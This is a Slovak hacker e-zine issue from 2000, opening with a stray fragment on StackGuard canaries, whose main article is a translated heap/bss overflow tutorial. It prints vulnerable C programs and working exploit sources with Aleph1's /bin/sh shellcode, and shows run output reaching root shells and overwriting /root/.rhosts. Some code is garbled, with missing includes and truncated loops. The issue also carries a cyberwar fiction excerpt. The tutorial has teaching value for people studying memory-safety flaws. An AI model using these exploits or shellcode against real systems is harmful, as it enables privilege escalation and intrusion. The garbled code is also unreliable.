Na to, aby ochrana bola ucinna, utocnik nemoze mat moznost naspoofovat
"canary" slovo nejakou hodnotou vlozenou do zasobnika cez overflowovany
retazec. Stackguard pouziva proti takemuto moznemu spoofvaniu dve metody :
"terminator" a "random".

Terminator canary obsahuje znaky NULL(0x00), CR (0x0d), LF (0x0a) a EOF (0xff)
- 4 znaky, ktore zabezpecia prerusenie vacsiny retazcovych operacii (strcpy,
sprintf...) a znizia riziko uspesneho overflowu.

Random hodnota sa vybera nahodne v okamihu pustenia programu. Tym padom utocnik
nemoze zistit tuto hodnotu prehladanim tela binarneho suboru. Nahodna hodnota
sa berie z /dev/urandom (ak je k dispozicii) alebo sa vytvori hashovanim
casu a datumu dna (ak /dev/urandom nie je systemom podporovany). Nahodnost
je povacsine dostatocna na to, aby sme zabranili vacsine moznych snah o
overflow.

Novsie verzie StackGuardu podporuju tzv. XOR Random Canary mechanizmus, kedy
sa xoruje nahodne (random value) hodnota s navratovou adresou funkcie. Canary
valid

00000001000001020061730200619271
pajkus
 pajkus      03.03.2004 - 13:40:50 , level: 1, UP   NEW




::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #14, 29.02.00 , prielom(at)hysteria.sk, http://hysteria.sk/prielom/





obsah
 



intro

heap/bss overflowy

velka kyberneticka vojna roku 2002 [dokoncenie]

.cz a .sk free mail servery

trojske kone v exploitoch

back orifice 2000 (show some control)

kybersaman [prva cast]







intro


otvoril som dvere a vysiel von pred chatu. nic, ziaden rozdiel. stale ten isty
clovek. iba zima sa mi zrazu zdala byt akasi ozajstnejsia ako cez okno. dalsie
cislo, nic viac. mnozstvo ludi bolo zrejme sklamanych a rozcarovanych. ziaden
koniec sveta, ziadna celosvetova katastrofa sposobena y2k bugom. iba dalsi zo
stupidnych zaciatkov kalendarneho roku podla gregorianskeho kalendara.


posledne dni tohto roku (zamerne nie tisicrocia, podla mna vsetko zacina cislom
1 a nie 0) som sa rozhodol stravit tak trochu mimo civilizacie. ani nie zo
strachu pred y2k, i ked dreva do krbu sme mali dost a petrolejky boli plne,(len
so zasobami potravin to bolo horsie) ale clovek obcas potrebuje vypnut a moje
rozhodnutie, ze aspon tyzden sa pocitaca nedotknem, sa mi podarilo zdarne
dotiahnut do konca. aj vdaka tomu, ze som sa uspesne vyhol navsteve martinskej
fakultnej nemocnice, sa mozete zacitat do dalsieho cisla prielomu.


ps. abba a beatles su vecni. bohuzial...


po miernom zdrzani sposobenym skuskovym obdobim a celkovou zaneprazdnenostou na
nas caka vycerpavajuci a rozsiahly uvod do heap/bss overflowov od wildera,
nasledovany iste uz netrpezlivo ocakavanou druhou (a poslednou) castou uryvku z
knihy velka kyberneticka vojna roku 2002. pozrieme sa trochu pod kozu
autentifikacnym systemom pouzivanych free mail servermi na slovensku a v cechach
(prilozeny aj exploit, v sucasnosti uz nepouzitelny ale ako nazorna ukazka
postacujuci). uz par krat sa objavili v roznych security-related mail konferenciach
exploity, ktore v skutocnosti neboli exploitmi ale trojskymi konmi. pozrieme sa ako
na ne a proti nim. pri trojskych konoch este zostaneme - caka nas recenzia na bo2k.
a na zaver trochu povodnej literarnej kyberpunkovej tvorby (na pokracovanie).



salo, 01.01.00 martinske hole, 29.02.00 zilina




heap/bss overflowy


uvod:


heap/bss zalozene overflowy su dost zvycajne v sucasnych aplikaciach, este
stale su ale len vynimocne zverejnovane. spravime si "heap overflow" tutorial.
v tomto clanku sa budeme odkazovat na "overflowy tykajuce sa stacku" ako
"stack-based overflowy" ("stack overflow" je zavadzajuce) a overflowy tykajuce
sa heap ako "heap-based overflowy". clanok by mal zabezpecit lepsie pochopenie
heap-based overflowov vyuzitim niekolkych metod exploitovania, prikladov a par
moznych rieseni. predpoklada sa vseobecne chapania pocitacovej architektury,
asembleru, c a stack overflowu. napisali sme vsetky priklady a exploity v tomto
clanku, ku vsetkym sa stahuje copyright.


preco su heap/bss overflowy tak dolezite


viacero systemovych predajcov pridava non-executable stack patche, alebo
individualne aplikuje vlastne patche (napr. solar designerov non-executable
stack patch), odlisna metoda prieniku je potrebna pre security konzultantov :))


uvedieme si par prikladov:


1. ked dame hladat slovo "heap" na bugtraqu, najdeme len 40 zhod, pokym
"stack" sa zhoduje v 2300 pripadoch. tiez "stack overflow" dava dva krat
viac zhod ako "heap"
2. solaris (os vyvinuty sun microsystems), ako solaris 2.6 sparc zahrnuje
"protect_stack" skript, ktory nie je ekvivalentny "protect_heap" skriptu
(hoci bss nie je executable).
3. existuje tiez "stackguard" (vyvinuty crispinom cowanom), ktory tiez
vlastnostami nezodpoveda "heapguardu"
4. pouzitie heap/bss-based overlowov je jedna z potencialnych metod na
vytocenie stackguardu.
5. niektori ludia v sucasnosti navrhuju ako riesenie vytvorenie "lokalneho"
bufra a "statickeho" bufra. nie je to velmi mudre, je to obycajne nespravna
predstava o tom, ako heap a bss pracuje.


hoci heap-based overflowy nie su nic nove, neboli doteraz dobre pochopene.
ludia robia vsetko preto, aby sa uchranili pred stack-based overflowmi, ale
nemyslia vobec na heap/bss. na viacerych systemoch, heap aj bss su vykonatelne
(executable) a zapisovatelne (writeable) [ skvela kombinacia ]. toto robi
heap/bss overflowy velmi pravdepodobne. neexistuje vsak pricina, preco by malo
byt bss vykonatelne. co sa bude spustat v nulami vyplnenej pamati?
pre vsetkych ludi od security, najviac heap-based overflowov su systemovo a
platformovo nezavisle, vratane non-executable heaps. vsetko to bude
demonstrovane v kapitole "exploitovanie heap/bss overflowov".


terminologia


vykonatelny subor, ako elf (executable and linking format) ma niekolko casti
v executable subore, ako je plt (procedure linking table), got (global offset
table), init (instrukcie vykonane pri inicializacii), fini (instrukcie, ktore
budu vykonane po skonceni), a ctors a dtors (obsahuje globalne
konstruktory/destruktory).

"pamat, ktora je dynamicky alokovana aplikaciou nazyvame heap."
slovo "aplikaciou" je velmi dolezite, pretoze na dobrych systemoch najviac
oblasti je v skutocnosti alokovane na urovni kernelu, pokym pri heap je
alokovanie vyziadane aplikaciou.


heap a data/bss sekcie


heap je teda oblast v pamati, ktora je dynamicky alokovana aplikaciou. data
sekcia je inicializovana v case kompilacie. bss sekcia obsahuje neinicializovane
data a je alokovana pocas behu. pokym sa tam nieco nezapise, zostava to
vynulovane (teda aspon z pohladu aplikacie). ked sa budeme v kapitole nizsie
odkazovat na "heap-based oveflowy", myslime tym sucasne heap/bss sekcie.
na vacsine systemoch, heap rastie hore (smerom k vyssim adresam). preto, ked
poviem, ze x je pod y, znamena to, ze x je v pamati nizsie ako y.


exploitovanie heap/bss overflowov


v tejto kapitole si ukazeme niekolko odlisnych metod na mozne vyuzitie heap/bss
overflowov. najviac prikladov je pre unixove x86 systemy, tiez to pobezi pod
dosom a windozami (s mensimi obmenami). tiez sme obsiahli niekolko dos/windows
specifickych exploitovacich metod.

v tomto clanku pouzivame "exact offset" pristup. offset musi byt najblizsie
aproximovany k jeho skutocnej hodnote. alternativou je "stack-based overflow
pristup", kedy sa opakuju adresy na zvysenie pravdepodobnosti uspesnosti
exploitu.


nasledujuci priklad moze vyzerat zbytocny, predkladame ho len pre tych, ktori
nie su oboznameni s heap-based overflowmi. takze kratka ukazka:



/* demonstrates dynamic overflow in heap (initialized data) */

#include
#include
#include
#include

#define bufsize 16
#define oversize 8 /* overflow buf2 by oversize bytes */

int main()
{
u_long diff;
char *buf1 = (char *)malloc(bufsize), *buf2 = (char *)malloc(bufsize);

diff = (u_long)buf2 - (u_long)buf1;
printf("buf1 = %p, buf2 = %p, diff = 0x%x bytesn", buf1, buf2, diff);

memset(buf2, 'a', bufsize-1), buf2[bufsize-1] = '';

printf("before overflow: buf2 = %sn", buf2);
memset(buf1, 'b', (u_int)(diff + oversize));
printf("after overflow: buf2 = %sn", buf2);

return 0;
}


po spusteni dostaneme:


[root /w00w00/heap/examples/basic]# ./heap1 8
buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = aaaaaaaaaaaaaaa
after overflow: buf2 = bbbbbbbbaaaaaaa


funguje to preto, lebo buf1 prepise hranice v oblasti buf2 heapu. pretoze
oblast heap2 je stale spravna cast pamate (nic dolezite sme neprepisali),
program nezleti.


mozny fix pre heap-based overflowy (ktore budu spomenute neskor) je vlozit
urcite hodnoty medzi vsetky premenne v heap oblasti (ako to robi stackguard
spomenuty neskor), ktore nesmu byt zmenene pocas vykonania (execution).
kompletny zdrojak so vsetkymi prikladmi pouzitych v tomto clanku je pristupny
v archive clankov na
http://www.w00w00.org/articles.html.


na demonstrovanie bss-based overflowu, zmenime riadok:

z: 'char *buf = malloc(bufsize)', na: 'static char buf[bufsize]'

bol to velmi jednoduchy priklad, pretoze sme chceli demonstrovat heap overflow
na najnizsom moznom stupni. to je zaklad takm vsetkych heap-based overflowov.
mozeme to pouzit pri prepisani nazvu suboru, hesla, ulozeneho uid a tak dalej.
tu je (stale jednoduchy) priklad s manipulaciou pointrami:



/* demonstrates static pointer overflow in bss (uninitialized data) */

#include
#include
#include
#include
#include

#define bufsize 16
#define addrlen 4 /* # of bytes in an address */

int main()
{
u_long diff;
static char buf[bufsize], *bufptr;

bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;

printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytesn",
&bufptr, bufptr, buf, diff, diff);

memset(buf, 'a', (u_int)(diff + addrlen));

printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytesn",
&bufptr, bufptr, buf, diff, diff);

return 0;
}


vysledky:


[root /w00w00/heap/examples/basic]# ./heap3
bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes
bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes


po spusteni jasne vidime, ze pointer teraz ukazuje na odlisnu adresu. pouzitim
coho? dalsi priklad je ukazkou toho, kedy mozeme prepisat docasne ulozeny
pointer na nazov suboru na ukazovatel na uplne odlisny retazec (napr. argv[1]),
co mozeme zabezpecit), pricom nas retazec moze obsahovat "/root/.rhosts".
konecne vidime nejake mozne (vy/zne)uzitie.


na demonstrovanie pouzijeme docasny subor na okamih ulozeny zo vstupu uzivatela.
toto je nas dokonceny "vulnerable" program:



/*
* this is a typical vulnerable program. it will store user input in a
* temporary file.
*
* compile as: gcc -o vulprog1 vulprog1.c
*/

#include
#include
#include
#include
#include

#define error -1
#define bufsize 16

/*
* run this vulprog as root or change the "vulfile" to something else.
* otherwise, even if the exploit works, it won't have permission to
* overwrite /root/.rhosts (the default "example").
*/

int main(int argc, char **argv)
{
file *tmpfd;
static char buf[bufsize], *tmpfile;

if (argc (i * 8) & 255);

mainbufsize = strlen(buf) + strlen(vulprog) +
strlen(vulprog) + strlen(vulfile) + 13;

mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbuf));

snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %sn",
buf, vulprog, vulfile);

printf("overflowing tmpaddr to point to %p, check %s after.nn",
addr, vulfile);

system(mainbuf);
return 0;
}

poznamka (wilder):
v takomto vydani mne osobne exploitik nebezal, vulfile som si nastavil iba
na .rhosts a cele som to z gdb-ckoval, bezalo mi to pri offsete 428 (teda +-15)
(rh6.0/glibc 2.1.1/kernel 2.2.9) [ pre tych, ktori si to chcu sfunkcnit ]


vysledok po spusteni:


[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330 (428)
overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after.

before: tmpfile = /tmp/vulprog.tmp
enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /root/.rhosts

a mame to. exploit prepisal buffer, ktory nas vulnerable program pouzival pre
gets() vstup. na konci tohto buffra, sme hodili adresu, na ktorej sme
predpokladali, ze lezi argv[1] tohto vulnerable programu. prepisali sme vsetko
medzi overflowanym bufferom a tmpfile pointerom. nakoniec sme prepisali tmpfile
pointer, ktory prestal ukazovat na nas tmpfile, ale na polozku argv[1] v nasom
stacku. taktiez ak mame zdrojak nasho vulnerable programu (hmm..nestava sa to
casto;-), mozeme pridat "printf()" na vytlacenie adries/offsetov medzi
overflowovanymi datami (ten buffer) a cielovymi datami (pointer na konci)
(napriklad 'printf("%p - %p = 0x%lx bytesn", buf2, buf1, (u_long)diff)').
nanestastie, offsety sa zvycajne menia v case-kompilacie, ale mozme ich lahko
prepocitat alebo pouzijeme offsety metodou "brute-force".


potrebujeme spravnu adresu (argv[1]), obratime poradie bajtikov pre little
endian systemy. little endian systemy pouzivaju najmenej vyznamny bajt ako prvy
(x86 je little endian), teda 0x123456 je ulozeny v pamati ako 0x563412. ak to
robime na big endian systemoch (ako sparc) tak sa na obratenie poradia bajtikov
mozeme vykaslat. zatial ziadny z tychto prikladov nevyzadoval vykonatelny heap!
ako sme spomenuli v casti "preco su heap/bss overflowy tak dolezite",
predchadzajuce priklady boli (az na vynimku s poradim adresovych bajtov)
systemovo/platformovo nezavisle. dost uzitocne pri exploitovani heap-based
overflowov.


so znalostou ako prepisovat pointre, ideme si ukazat ako modifikovat pointre
funkcii. na exploitovanie pointerov funkcii vyzadujeme vykonatelny heap. pointer
na funkciu (napr. "int (*funcptr)(char *str)") povoluje programatorom dynamicky
modifikovat funkciu, ktora bude volana. pointer na funkciu mozeme prepisat
prepisanim jeho adresy, teda po prepisani sa zavola funkcia, ktorej pointer tam
nastavime. pred vsetkym najskor vlozime nas shellcode. to mozme urobit
nasledovne:


1. argv[] metodou: ulozime shellcode ako argument programu (to vyzaduje
executable stack)
2. heap offsetovou metodou: offsetom z vrcholu heapu na predpokladanu adresu
cieloveho/overflow bufra (vyzaduje executable heap)


je vacsia pravdepodobnost, ze heap bude vykonatelny (executable) na danom
systeme ako napriklad stack. teda heap metoda pobezi pravdepodobne castejsie.
druha metoda je jednoducho uhadnut (to je dost neefektivne) adresu funkcie
pouzitim predpokladaneho offsetu vo vulnerable programu. tiez, ak pozname adresu
system() v nasom programe, bude pravdepodobne na velmi blizkom offsete v
exploite, teda ak predpokladame, ze vulprog/exploit boli skompilovani zhruba
rovnakym sposobom. vyhoda je, ze nic vykonatelne nie je nutne.


dalsia metoda je pouzit plt (procedure linking table), ktora obsahuje adresy
funkcii v plt. druhu metodu uprednostnime hlavne koli jednoduchosti. mozeme
uhadnut offset volania system() vo vulprog z adresy system() v nasom exploite
celkom rychlo. obdobne je to vo vzdialenych systemoch (predpokladame rovnake
verzie, operacne systemy, platformy). s metodou stacku mame tu vyhodu, ze
prakticky mozme urobit, co chceme, teda nevyzadujeme kompatibilne pointre na
funkcie (napr. char (*funcptr)(int a) a void (*funcptr)() pobezi rovnako).
nevyhoda stackovej metody je ze vyzadujeme executable stack.


nas vulnerable program pre nase 2 exploity:



/*
* just the vulnerable program we will exploit.
* compile as: gcc -o vulprog vulprog.c (or change exploit macros)
*/

#include
#include
#include
#include

#define error -1
#define bufsize 64

int goodfunc(const char *str); /* funcptr starts out as this */

int main(int argc, char **argv)
{
static char buf[bufsize];
static int (*funcptr)(const char *str);

if (argc (i * 8)) & 255;

execl(vulprog, vulprog, buf, cmd, null);
return 0;
}

ked to spustime s offsetom 16 (na mojej masine 12) dostaneme:



[root /w00w00/heap/examples]# ./exploit1 16
trying system() at 0x80484d0
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd3c
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x80484d0
bash#

druhy priklad (do zivota), ktory pouziva argv[] metodu (cez stack) a
heap-metodu.



/*
* copyright (c) january 1999, matt conover & wsd
*
* this demonstrates how to exploit a static buffer to point the
* function pointer at argv[] to execute shellcode. this requires
* an executable heap to succeed.
*
* the exploit takes two argumenst (the offset and "heap"/"stack").
* for argv[] method, it's an estimated offset to argv[2] from
* the stack top. for the heap offset method, it's an estimated offset
* to the target/overflow buffer from the heap top.
*
* try values somewhere between 325-345 for argv[] method, and 420-450
* for heap.
*
* to compile use: gcc -o exploit2 exploit2.c
*/

#include
#include
#include
#include

#define error -1
#define bufsize 64 /* estimated diff between buf/funcptr */

#define vulprog "./vulprog" /* where the vulprog is */



char shellcode[] = /* just aleph1's old shellcode (linux x86) */
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0"
"x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8"
"x40xcdx80xe8xdcxffxffxff/bin/sh";

u_long getesp()
{
__asm__("movl %esp,%eax"); /* set sp as return value */
}

int main(int argc, char **argv)
{
register int i;
u_long sysaddr;
char buf[bufsize + sizeof(u_long) + 1];

if (argc > (i * 8)) & 255;

execl(vulprog, vulprog, buf, shellcode, null);
return 0;
}

po spusteni s offsetom 334 (pre mna 441) v argv[] metode dostaneme:



[root /w00w00/heap/examples] ./exploit2 334 stack
using stack for shellcode (requires exec. stack)
using 0xbffffd16 as our argv[1] address

(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0xbffffd16
bash#

po spusteni s offsetom 428-442 (pre mna 516) heap offsetovom metodou dostaneme:



[root /w00w00/heap/examples] ./exploit2 428 heap
using heap buffer for shellcode (requires exec. heap)
using 0x804a9a8 as our buffer's address

(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x804a9a8
bash#

btw: svoje offsety udavam len informacne, vsetky sa tykaju (ako som uz spominal)
konfiguracie rh 6.0 / glibc 2.1.1 / kernel 2.2.9, kompilacia gcc -ggdb -wall


dalsia vyhoda heap metody je, ze mame sirsi adresovy rozsah. s argv[] (stack)
metodou, musime byt presni. s heap offsetovou metodou, hocijaky offset s 428-442
by mal ist. ako vidime, existuje niekolko odlisnych metod na exploitovanie
jednej veci. ako pridavny bonus, si prilozime finalny typ exploitovania, ktory
pouziva jmp_bufs (setjmp/longjmp). jmp_buf sa normalne uklada do stacku a neskor
sa na to skace (pocas vykonania). ak mame moznost overflownut buffer medzi
setjmp() a longjmp(), ktory je nad overflowujucim buffrom, tak existuje moznost
exploitovania. mozeme nastavit emulaciu spravania stack-based overflowu (ako to
robi argv[] shellcode metoda spomenuta skor). nasledujuci priklad (s jmp_buf) je
pre x86 systemy. je to nutne prislusne zmenit pre ostatne platformy.


najskor nas vulnerable program:



/*
* this is just a basic vulnerable program to demonstrate
* how to overwrite/modify jmp_buf's to modify the course of
* execution.
*/

#include
#include
#include
#include
#include

#define error -1
#define bufsize 16

static char buf[bufsize];
jmp_buf jmpbuf;

u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
} int main(int argc, char **argv)
{
if (argc 0, we got here from longjmp() */
{
fprintf(stderr, "error: exploit didn't workn");
exit(error);
}
/* v glibc 2.x.x je nutne pristupovat cez jmpbuf[jb_?x] k jednotlivym registrom jednotlive polozky __bx, __si, __di su totiz nezname
printf("before:n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lxn",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

printf("bp = %p, sp = %p, pc = %pnn",
jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc); */

strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */

/*
printf("after:n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lxn",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

printf("bp = %p, sp = %p, pc = %pnn",
jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);
*/
longjmp(jmpbuf, 1);
return 0;
}

a patricny exploit:



/*
* copyright (c) january 1999, matt conover & wsd
*
* demonstrates a method of overwriting jmpbuf's (setjmp/longjmp)
* to emulate a stack-based overflow in the heap. by that i mean,
* you would overflow the sp/pc of the jmpbuf. when longjmp() is
* called, it will execute the next instruction at that address.
* therefore, we can stick shellcode at this address (as the data/heap
* section on most systems is executable), and it will be executed.
*
* this takes two arguments (offsets):
* arg 1 - stack offset (should be about 25-45).
* arg 2 - argv offset (should be about 310-330).
*/

#include
#include
#include
#include

#define error -1
#define bufsize 16

#define vulprog "./vulprog4"

char shellcode[] = /* just aleph1's old shellcode (linux x86) */
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0"
"x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8"
"x40xcdx80xe8xdcxffxffxff/bin/sh";
u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
}

int main(int argc, char **argv)
{
int stackaddr, argvaddr;
register int index, i, j;

char buf[bufsize + 24 + 1];

if (argc > (i * 8)) & 255;
}

/* ----------------------------- */

for (i = 0; i < sizeof(u_long); i++) /* setup sp */
{
index = bufsize + 20 + i;
buf[index] = (stackaddr >> (i * 8)) & 255;
}


/* ----------------------------- */

for (i = 0; i < sizeof(u_long); i++) /* setup pc */
{
index = bufsize + 24 + i;
buf[index] = (argvaddr >> (i * 8)) & 255;
}

execl(vulprog, vulprog, buf, shellcode, null);
return 0;
}

mne osobne sa tento exploit nepodarilo rozbehat ani pri umornom gdb-ckovani.
strukturu jmpbuf, ktoru prepisujeme sa sklada postupne z poloziek ebx, esi, edi,
ebp, esp, pc (dokopy 24 bajtov + nejake flagy, ktore nas nezaujimaju), nasim
buffrom prepisujeme len obsah ebp=esp a pc. pricom esp prepisame hodnotou nasho
vulnerable programu (teda sa nic nestane) a pc prepiseme pointerom do stacku na
argv[2], kde je nas shellcode. vsetko by to malo pekne bezat. v skutocnosti sa
vyskytol problem, kedy struktura jmpbuf nie je hned zarovnana za nasim
16-bajtovym overflowovanym buffrom (kompilator pre mna z cudesnych dovodov nam
nechal medzeru 20 bajtov???), preto aj v exploite potom treba urobit patricne
zmeny (buffsize += 20, okrem toho jednotlive polozky ebp, esp, pc nasleduju v
strukture od 12,16,20 bajtu (nie 16,20,24 ako to je v exploite). po tychto
upravach (to v debuggeri vyzeralo vsetko pekne), ale neslo to, nakolko
jednotlive hodnoty registrov bez gdb boli vsetky ine. myslienka je ale spravna,
a teoreticky by to malo slapat po spusteni so stack offsetom 36 argv[2] offsetom
322 by sme mali dostat:



[root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322
trying address 0xbffffcf6 for argv[2]
trying address 0xbffffb90 for sp

[vulprog] argv[2] = 0xbffffcf6
[vulprog] sp = 0xbffffb90

before:
bx = 0x0, si = 0x40001fb0, di = 0x4000000f
bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715

after:
bx = 0x1010101, si = 0x1010101, di = 0x1010101
bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6

bash#

existuju citlive data na heape, ktore mozu byt overflowovane. napriklad:

funkcia: pricina:
1. *gets()/*printf(), *scanf() __iob (file) structure in heap
2. popen() __iob (file) structure in heap
3. *dir() (readdir, seekdir, ...) dir entries (dir/heap buffers)
4. atexit() static/global function pointers
5. strdup() allocates dynamic data in the heap
7. getenv() stored data on heap
8. tmpnam() stored data on heap
9. malloc() chain pointers
10. rpc callback functions function pointers
11. windows callback functions func pointers kept on heap
12. signal handler pointers function pointers (note: unix tracks
in cygnus (gcc for win), these in the kernel, not in the heap)

mozeme sa teraz pozriet na pouzitie tychto funkcii. miesto alokovane pre file
struktury vo funkciach ako printf(), fget(), readdir(), seekdir() atd. sa da
vyuzit (bud ako buffer, alebo pointer na funkciu). atexit() ma pointery (v
pamati) na funkcie, ktore budu volane, ked program skonci, strdup() moze ukladat
retazce (ako nazvy suborov alebo hesla) do heapu, malloc() ma vlastne retazcove
pointre, ktorymi sa da pristupovat do pamate, getenv() uklada data do heapu, co
nam dovoluje modifikovat nieco ako $home, potom ako bude na zaciatku
skontrolovany. svc/rpc funkcie (librpc, libnsl atd) udrziavaju navratove funkcie
(ulozene v heape).


predvedieme si prepisanie windows navratovych funkcii a prepisanie file (__iob)
struktur (s popen). ked vieme ako prepisovat file struktury s popen(), dokazeme
si celkom rychlo predstavit, ako to robit s inymi funkciami (napr. *printf,
*gets, *scanf, atd), tak dobre, ako aj s dir strukturami (pretoze su velmi
podobne).


heap-based overflow sa dal vyuzit v bsdi crontabe po zadani dlheho nazvu suboru,
ktore overflowol staticky buffer. nad buffrom v pamati sme mali pwd strukturu!
teda ulozeny username, password, uid, gid atd. prepisanim uid/gid polozky v pw,
sme mohli nastavit privilegia s ktorymi crondaemon pustil nas crontab. nas
script (v crontabe) mohol hodit suid root shell (fantazii sa medze nekladu),
pretoze to cele frcalo pod uid/gid 0.

tiez bolo mozne ziskat roota, potom ako sme exploitli heap overflowom uucp
privilegia prepisanim statickeho buffra pri zadavani nazvu subor na
send/receive.


mozna ochrana:


samozrejme, najlepsia ochrana pred heap-based overflowmi je pisat v prvom rade
dobry kod. podobne ako pred stack-based overflowmi, zatial neexistuje nejaky
realny sposob na prevenciu heap-based overflowov. existuje speci soft na
kontrolovanie hranic (na detekciu najcastejsich moznych heap-based overflowov)
pre gcc/egcs vyvinuty richardom jonesom a paulom kelly
(http://www.annexia.demon.co.uk). detekuje pretecenie zapricinene ludskym
faktorom. pre windozy existuje numega bounds'checker, ktory robi zhruba rovnaku
kontrolu hranic ako bounds checking pri gcc. stale mozeme vytvorit
non-executable heap patch (ale ako sme spominali na zaciatku vacsina systemov
ma executable heap). solar designer spomenul, ze hlavne problemy s
non-executable sa bude tykat compilerov, interpreterov atd.
k non-executable heap patchu treba dodat, ze jedine, co zabezpeci je, ze
nemozeme vykonavat instrukcie v heapu, vonkoncom to nie je ochrana proti
prepisovania dat (pointerov) v heape [ heheh. to sa bude dat este pekne dlho ;-)]
existuje moznost vytvorit heapguard, ktory bude ekvivalentny cowanovmu
stackguardu (ktory sme uz spominali). jeho funkciou je zabranit prepisovaniu
navratovych adries (na stacku) nejakym exploitom. vobec nezabranuje heap/bss
overflowom. mozno niekedy v buducnosti sa niecoho dockame...


odkazy:


solar designer: superprobe exploit (pointre funkcii), color_xterm

exploit (pointre struktur), website (pointre poli), etc.

l0pht: internet explorer 4.01 vulnerablity (dildog), bsdi crontab

exploit (mudge), etc.

joe zbiciak/adam morisson



matt conover (a.k.a. shok) & w00w00 security team,

preklad a uprava: wilder, wilder(at)hq.alert.sk


navrat na obsah




velka kyberneticka vojna roku 2002 [dokoncenie]


24 jul, 21:42 edt


to bol den! tu je to, co sa stalo, vacsinu z toho dnes v spravach nenajdete, ak
vobec niekedy.


operacie triphammer a javelin - v kolumbii a spratly - zacali dnes skoro rano,
pol zemegule vzdialene ale takmer sucasne.


zhrnutie, ktore som si narychlo pozrel, ukazuje, ze obe americke utocne jednotky
boli velke "baliky", ktore potrebuju velku transportnu a bojovu podporu, co
znamena, ze bolo lahke ich zbadat, ako sa presuvaju k utoku. vlastne to vyzera,
ako keby jedna z jednotiek bola uplne ocakavana. jednotka triphammer nasla len
opustenu operacnu bazu - avsak az potom, co sa prebojovala cez automaticky
ovladany gulomet a obranny system. (napada ma myslienka - kto to vsetko plati?)
ked rangeri dosiahli riadiace centrum, cele zariadenie bolo dialkovo odpalene,
kopa mrtvych. kolumbijska vlada protestovala proti vpadu. senator trumball
povedal:

"viete co? kolumbijska kokainova vlada mi moze pobozkat moju rebelsku rit."

a vacsina krajiny s vyhlasenim suhlasila - ta ista vacsina, ktora by este pred
rokom tento prejav odsudila ako nechutny.


druha utocna jednotka na ceste k zakladni spratly bola v obojzivelnom vozidle
privitana dialkovo ovladanou minou, ktora im vybuchla priamo pri kyle, cim lod
zlomila napoly. operacia javelin pokracovala dalej s tromi helikopterami plnymi
marinakov, ktori zautocili na pobrezie. tentokrat nasli obsadene operacne
kontrolne centrum a po kratkej ale prudkej prestrelke, pri ktorej zabili 20
obrancov stanovista, zajali 4 vaznov a par kusov vybavenia, ktore nebolo znicene
pocas stretu. dufam, ze tyto manici neboli len pasca.


kde je laurie?


25 jul 15:39 edt


prezidentka zase prehovorila k narodu, tentokrat oplakavala stratu mnozstva
rangerov a marinakov. tiez spomenula velku odplatu, ktoru utocnici zaziju v
nasledujucich dnoch. asi takto:


"opat raz je amerika ochranovana svojimi odvaznymi bojovnikmi. a s bozou volou
budu pokracovat, az do nasho vitazstva. pretoze nasi nepriatelia bojuju
len z temneho pritmia, musia nakoniec tuto vojnu prehrat - zmiznu z povrchu
zemskeho..."


hocaka uzasna je prezidentkina vyrecnost, nemoze to vsak zmenit fakt, ze jej
rating klesol na 12 percent. je na tom horsie ako nixon pocas afery watergate.
jedna dobra vec: zda sa, ze jednotky nenasli nic co by ukazovalo na cinanov.


najdramatickejsou udalostou dna vsak bolo dorucenie videopasky v kabule, ktora
bola posunuta bezmennym poulicnym chuliganom christiane amanpourovej zo cnn, ked
robila reportaz z afghanistanu.


bola to nahrata sprava od "talusa", ktory sam seba nazvlal hovorcom pfw. aj ked
taulus bol az prilis ukecany, bolo jasne o co ide:


"pfw su oslabeni stratou svojich hrdinov, ale ich krv moze len posvetit nas
zamer. posledny utok zacne hned ako sa nase sily, ktore su pocetne ako zrnka
piesku v pusti, spoja, aby zasadili posledny uder"


vsetko vyzera autenticky. v sprave cia pre excomm je uvedene, ze paska bola
